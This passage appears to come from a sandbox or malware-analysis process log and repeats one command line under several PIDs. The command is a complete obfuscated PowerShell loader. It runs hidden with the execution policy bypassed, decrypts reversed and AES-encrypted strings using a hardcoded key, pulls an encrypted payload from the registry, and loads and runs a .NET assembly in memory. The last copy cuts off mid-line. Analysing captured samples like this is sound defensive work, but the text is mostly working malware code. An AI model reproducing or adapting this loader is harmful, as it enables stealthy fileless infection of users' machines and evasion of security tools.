$zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:1200
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:7756
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:4576
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        33⤵
        
        PID:7140
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3076).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join 